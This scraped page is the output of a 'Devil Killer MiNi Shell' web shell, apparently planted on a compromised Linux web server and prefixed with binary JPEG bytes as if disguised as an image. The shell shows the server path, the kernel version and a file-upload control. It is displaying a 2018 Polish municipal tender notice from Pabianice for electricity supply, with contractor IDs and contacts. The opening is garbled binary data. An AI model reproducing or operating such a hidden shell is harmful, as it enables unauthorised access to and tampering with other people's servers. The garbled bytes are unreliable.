JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180604/567173-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 567173-N-2018 z dnia 2018-06-04 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Miejska Pabianice reprezentowana przez Prezydenta Miasta Pabianic Grzegorza Mackiewicza</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa energii elektrycznej do punktów poboru energii elektrycznej Miasta Pabianice w ramach wspólnego zamówienia prowadzonego w trybie art. 16 ust. 1 ustawy Prawo zamówień publicznych</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Tak</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Podmiot</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>1)	Miasto Pabianice - Urząd Miejski w Pabianicach, 95-200 Pabianice ul. Zamkowa 16, NIP 731-196-27-56, REGON 472057715, w tym: a)	Kancelaria Prezydenta Miasta Pabianic (KPM), b)	Wydział Infrastruktury Technicznej i Komunikacji (ITK), c)	Wydział Ochrony Środowiska (OS).</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>2) Żłobek Miejski, 95-200 Pabianice ul. Moniuszki 146 NIP 7311329220, REGON 471000050;</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>3)	Przedszkole Miejskie nr 2, 95-200 Pabianice ul. Cicha 26, NIP 7311058910, REGON 000733174;</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>4)	Przedszkole Miejskie nr 3, 95-200 Pabianice ul. Moniuszki 163, NIP 7311055567, REGON 004271670</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>5)	Przedszkole Miejskie nr 4, 95-200 Pabianice ul. Żytnia 13/17, NIP 7311230131, REGON 004271724;</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>6)	Przedszkole Miejskie nr 5, 95-200 Pabianice ul. Zamkowa 48, NIP 7311428991, REGON 000733168;</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>7)	Przedszkole Miejskie nr 6, 95-200 Pabianice ul. Warszawska 53, NIP 7311129515, REGON 000733118</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>8)	Przedszkole Miejskie nr 8, 95-200 Pabianice ul. Św. Jana 43, NIP 7311015042, REGON 470010537;</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>9)	Przedszkole Miejskie nr 11 z Oddziałami Integracyjnymi, 95-200 Pabianice ul. Św. Jana 28, NIP 7311028174, REGON 004271693;</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>10)	Przedszkole Miejskie nr 12, 95-200 Pabianice ul. Śniadeckiego 6a, NIP 7311129024, REGON 470010543;</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>11)	Przedszkole Miejskie nr 13, 95-200 Pabianice ul. Mokra 19/23, NIP 7311129863, REGON 470010550</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>12)	Przedszkole Miejskie nr 14, 95-200 Pabianice ul. Odrodzenia 10, NIP 7311129030, REGON 004271701;</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>13)	Przedszkole Miejskie nr 15, 95-200 Pabianice ul. ks. Piotra Skargi 75, NIP 7311028168, REGON 470010566;</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>14)	Przedszkole Miejskie nr 16 z Oddziałami Integracyjnymi i Specjalnymi, 95-200 Pabianice, ul. Bugaj 58 NIP 7311129900, REGON 004271718;</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15)	Szkoła Podstawowa nr 1 z Klasami Integracyjnymi, 95-200 Pabianice ul. Pułaskiego 22/24, NIP 7311236553, REGON 000210737;</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>16) Szkoła Podstawowa nr 2, 95-200 Pabianice ul. Tkacka 15, NIP 7312057781, REGON 367991897;</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>16) Szkoła Podstawowa nr 2, 95-200 Pabianice ul. Tkacka 15, NIP 7312057781, REGON 367991897;</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>17)	Szkoła Podstawowa nr 3, 95-200 Pabianice ul. Mokra 28/34, NIP 7311129567, REGON 001385002; </TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>18)	Szkoła Podstawowa nr 5, 95-200 Pabianice ul. Zamkowa 65, NIP 7311129805, REGON 000211493;</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>19)	Szkoła Podstawowa nr 8, 95-200 Pabianice ul. ks. Piotra Skargi 30, NIP 7311027944, REGON 000212417; </TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>20)	Szkoła Podstawowa nr 9 z Oddziałami Integracyjnymi, 95-200 Pabianice ul. Partyzancka 56a, NIP 7311015579, REGON 000212630;</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>21)	Szkoła Podstawowa nr 13, 95-200 Pabianice ul. Jana Pawła II 16, NIP 7311014396, REGON 000213693; </TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>22)	Szkoła Podstawowa nr 14, 95-200 Pabianice ul. Ostatnia 15a, NIP 7311235588, REGON 000213925;</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>23)	Szkoła Podstawowa nr 15, 95-200 Pabianice ul. Marii Skłodowskiej-Curie 5, NIP 7312057723, REGON 367999023; </TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>24)	Szkoła Podstawowa nr 16, 95-200 Pabianice ul. 20 Stycznia 9/13, NIP 7312057798, REGON 367992081;</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>25)	Szkoła Podstawowa nr 17, 95-200 Pabianice ul. Warszawska 65, NIP 7311015591, REGON 000214528; </TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>26)	Miejskie Centrum Pomocy Społecznej, 95-200 Pabianice, ul, Gdańska 7, NIP 7311875388, REGON 473215122;</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>27)	Środowiskowy Dom Pomocy Dla Osób Przewlekle Chorych Psychicznie i Niepełnosprawnych Intelektualnie (typ AB), 95-200 Pabianice ul. Cicha 24, NIP 7312042874, REGON 101340427; </TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>28)	Miejski Ośrodek Sportu i Rekreacji, 95-200 Pabianice, ul. gen. Stefana ,,Grota" Roweckiego 3, NIP 7312030032, REGON 100999466;</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>29)	Miejski Zakład Pogrzebowy, 95-200 Pabianice, ul. Jana Kilińskiego57/59, NIP 7310006880, REGON 1010111155; </TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30)	Schronisko Dla Zwierząt w Pabianicach, 95-200 Pabianice, ul. Partyzancka 110, NIP 7311748589, REGON 472283819;</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>31)	Zakład Gospodarki Mieszkaniowej, 95-200 Pabianice, ul. Warzywna 6, NIP 7310005774, REGON 470013843;</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'> 32)	Zarząd Dróg Miejskich, 95-200 Pabianice, ul. Warzywna 1, NIP 7312053808, REGON 365914881;</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'> 33)	Miejska Biblioteka Publiczna, 95-200 Pabianice, ul. Św. Jana 10, NIP 7311140379, REGON 470930835;</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>34)	Miejski Ośrodek Kultury, 95-200 Pabianice, ul. Kościuszki 14, NIP 7311008214, REGON 470587840; </TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>35)	Muzeum miasta Pabianic, 95-200 Pabianice, ul. Stary Rynek 1/2, NIP 7311368214, REGON 470931409; </TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>36)	Miejski Zakład Komunikacyjny Sp. z o. o; 95-200 Pabianice, u. Lutomierska 48, NIP 7311923934, REGON 100065150;</TD></TR></TABLE> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy">Wspólne zamówienie prowadzone jest na podstawie:1.	Zarządzenia Nr 99/2018/P Prezydenta Miasta Pabianic z dnia 22 maja 2018 w sprawie wyznaczenia jednostki organizacyjnej właściwej do przeprowadzenia postępowania i udzielenie zamówienia publicznego na zakup energii elektrycznej na rzecz samorządowych jednostek organizacyjnych Miasta Pabianic,2.	Porozumienia w sprawie wspólnego przeprowadzenia postępowania i udzielenie zamówienia publicznego na zakup energii elektrycznej z dnia 17 maja 2018 zawartego pomiędzy Miastem Pabianice a instytucjami kultury i spółką komunalną;1.	Przedmiotem zamówienia jest dostawa energii elektrycznej zgodnie z przepisami ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne (tj. Dz.U. Z 2017 r. poz. 220 z późn. zm.) dla potrzeb Miasta Pabianice wraz z podległymi jednostkami organizacyjnymi wg poniższego wykazu Kontrahentów:1)	Miasto Pabianice - Urząd Miejski w Pabianicach, 95-200 Pabianice ul. Zamkowa 16, NIP 731-196-27-56, REGON 472057715, w tym:a)	Kancelaria Prezydenta Miasta Pabianic (KPM),b)	Wydział Infrastruktury Technicznej i Komunikacji (ITK),c)	Wydział Ochrony Środowiska (OS).2)	Żłobek Miejski, 95-200 Pabianice ul. Moniuszki 146 NIP 7311329220, REGON 471000050;3)	Przedszkole Miejskie nr 2, 95-200 Pabianice ul. Cicha 26, NIP 7311058910, REGON 000733174;4)	Przedszkole Miejskie nr 3, 95-200 Pabianice ul. Moniuszki 163, NIP 7311055567, REGON 0042716705)	Przedszkole Miejskie nr 4, 95-200 Pabianice ul. Żytnia 13/17, NIP 7311230131, REGON 004271724;6)	Przedszkole Miejskie nr 5, 95-200 Pabianice ul. Zamkowa 48, NIP 7311428991, REGON 000733168;7)	Przedszkole Miejskie nr 6, 95-200 Pabianice ul. Warszawska 53, NIP 7311129515, REGON 0007331188)	Przedszkole Miejskie nr 8, 95-200 Pabianice ul. Św. Jana 43, NIP 7311015042, REGON 470010537;9)	Przedszkole Miejskie nr 11 z Oddziałami Integracyjnymi, 95-200 Pabianice ul. Św. Jana 28, NIP 7311028174, REGON 004271693;10)	Przedszkole Miejskie nr 12, 95-200 Pabianice ul. Śniadeckiego 6a, NIP 7311129024, REGON 470010543;11)	Przedszkole Miejskie nr 13, 95-200 Pabianice ul. Mokra 19/23, NIP 7311129863, REGON 47001055012)	Przedszkole Miejskie nr 14, 95-200 Pabianice ul. Odrodzenia 10, NIP 7311129030, REGON 004271701;13)	Przedszkole Miejskie nr 15, 95-200 Pabianice ul. ks. Piotra Skargi 75, NIP 7311028168, REGON 470010566;14)	Przedszkole Miejskie nr 16 z Oddziałami Integracyjnymi i Specjalnymi, 95-200 Pabianice, ul. Bugaj 58 NIP 7311129900, REGON 004271718;15)	Szkoła Podstawowa nr 1 z Klasami Integracyjnymi, 95-200 Pabianice ul. Pułaskiego 22/24, NIP 7311236553, REGON 000210737;16) Szkoła Podstawowa nr 2, 95-200 Pabianice ul. Tkacka 15, NIP 7312057781, REGON 367991897;17)	Szkoła Podstawowa nr 3, 95-200 Pabianice ul. Mokra 28/34, NIP 7311129567, REGON 001385002;18)	Szkoła Podstawowa nr 5, 95-200 Pabianice ul. Zamkowa 65, NIP 7311129805, REGON 000211493;19)	Szkoła Podstawowa nr 8, 95-200 Pabianice ul. ks. Piotra Skargi 30, NIP 7311027944, REGON 000212417;20)	Szkoła Podstawowa nr 9 z Oddziałami Integracyjnymi, 95-200 Pabianice ul. Partyzancka 56a, NIP 7311015579, REGON 000212630;21)	Szkoła Podstawowa nr 13, 95-200 Pabianice ul. Jana Pawła II 16, NIP 7311014396, REGON 000213693;22)	Szkoła Podstawowa nr 14, 95-200 Pabianice ul. Ostatnia 15a, NIP 7311235588, REGON 000213925;23)	Szkoła Podstawowa nr 15, 95-200 Pabianice ul. Marii Skłodowskiej-Curie 5, NIP 7312057723, REGON 367999023;24)	Szkoła Podstawowa nr 16, 95-200 Pabianice ul. 20 Stycznia 9/13, NIP 7312057798, REGON 367992081;25)	Szkoła Podstawowa nr 17, 95-200 Pabianice ul. Warszawska 65, NIP 7311015591, REGON 000214528;26)	Miejskie Centrum Pomocy Społecznej, 95-200 Pabianice, ul, Gdańska 7, NIP 7311875388, REGON 473215122;27)	Środowiskowy Dom Pomocy Dla Osób Przewlekle Chorych Psychicznie i Niepełnosprawnych Intelektualnie (typ AB), 95-200 Pabianice ul. Cicha 24, NIP 7312042874, REGON 101340427;28)	Miejski Ośrodek Sportu i Rekreacji, 95-200 Pabianice, ul. gen. Stefana ,,Grota" Roweckiego 3, NIP 7312030032, REGON 100999466;29)	Miejski Zakład Pogrzebowy, 95-200 Pabianice, ul. Jana Kilińskiego57/59, NIP 7310006880, REGON 1010111155;30)	Schronisko Dla Zwierząt w Pabianicach, 95-200 Pabianice, ul. Partyzancka 110, NIP 7311748589, REGON 472283819;31)	Zakład Gospodarki Mieszkaniowej, 95-200 Pabianice, ul. Warzywna 6, NIP 7310005774, REGON 470013843;32)	Zarząd Dróg Miejskich, 95-200 Pabianice, ul. Warzywna 1, NIP 7312053808, REGON 365914881;33)	Miejska Biblioteka Publiczna, 95-200 Pabianice, ul. Św. Jana 10, NIP 7311140379, REGON 470930835;34)	Miejski Ośrodek Kultury, 95-200 Pabianice, ul. Kościuszki 14, NIP 7311008214, REGON 470587840;35)	Muzeum miasta Pabianic, 95-200 Pabianice, ul. Stary Rynek 1/2, NIP 7311368214, REGON 470931409;36)	Miejski Zakład Komunikacyjny Sp. z o. o; 95-200 Pabianice, u. Lutomierska 48, NIP 7311923934, REGON 100065150;Osobą uprawnioną przez Zamawiających wspólnie przeprowadzających postępowanie do porozumiewania się z Wykonawcami jest:1) w kwestiach formalnych - Edyta Fila - Wyleżych - główny specjalista ds. zamówień publicznych i kontroli zarządczej,2) w kwestiach merytorycznych - Sławomir Jach - inspektor w Wydziale Infrastruktury Technicznej i Komunikacji.Adres e-mail osób do kontaktu: komunikacja@um.pabianice.pl</span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Miejska Pabianice reprezentowana przez Prezydenta Miasta Pabianic Grzegorza Mackiewicza</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">51691000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Zamkowa</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">16</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">95200 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Pabianice</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">łódzkie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">422 254 600</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">efila@um.pabianice.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">422 254 669</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://www.bip.um.pabianice.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia">Za przeprowadzenie postępowania odpowiedzialny jest Zamawiający: Miasto Pabianice, reprezentowane przez Grzegorza Mackiewicza - Prezydenta Miasta Pabianic, Siedziba Zamawiającego: 95-200 Pabianice, ul. Zamkowa 16tel. (0-42) 22-54-615, faks (0- 42)22-54-669, NIP: 731-196-27-56, REGON: 472057715, Adres internetowy: http://www.bip.um.pabianice.pl , e-mail: poczta@um.pabianice.pl.Wspólne zamówienie prowadzone jest na podstawie:1.	Zarządzenia Nr 99/2018/P Prezydenta Miasta Pabianic z dnia 22 maja 2018 w sprawie wyznaczenia jednostki organizacyjnej właściwej do przeprowadzenia postępowania i udzielenie zamówienia publicznego na zakup energii elektrycznej na rzecz samorządowych jednostek organizacyjnych Miasta Pabianic,2.	Porozumienia w sprawie wspólnego przeprowadzenia postępowania i udzielenie zamówienia publicznego na zakup energii elektrycznej z dnia 17 maja 2018 zawartego pomiędzy Miastem Pabianice a instytucjami kultury i spółką komunalną.W wyniku rozstrzygnięcia niniejszego postępowania na dostawę energii elektrycznej Wykonawca zawrze umowę generalną wg wzoru zawartego w Załączniku Nr 6 do SIWZ z Miastem Pabianice oraz umowy szczegółowe z każdym podmiotem uczestniczącym w niniejszym postępowaniu (wymieniony w Rozdz. III pkt. 1) odrębną umowę. W treściach umów szczegółowych zostaną zawarte informacje dotycząca opisu faktur dla tych podmiotów w zakresie Nabywcy oraz Odbiorcy.</span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://www.bip.um.pabianice.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://www.bip.um.pabianice.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span 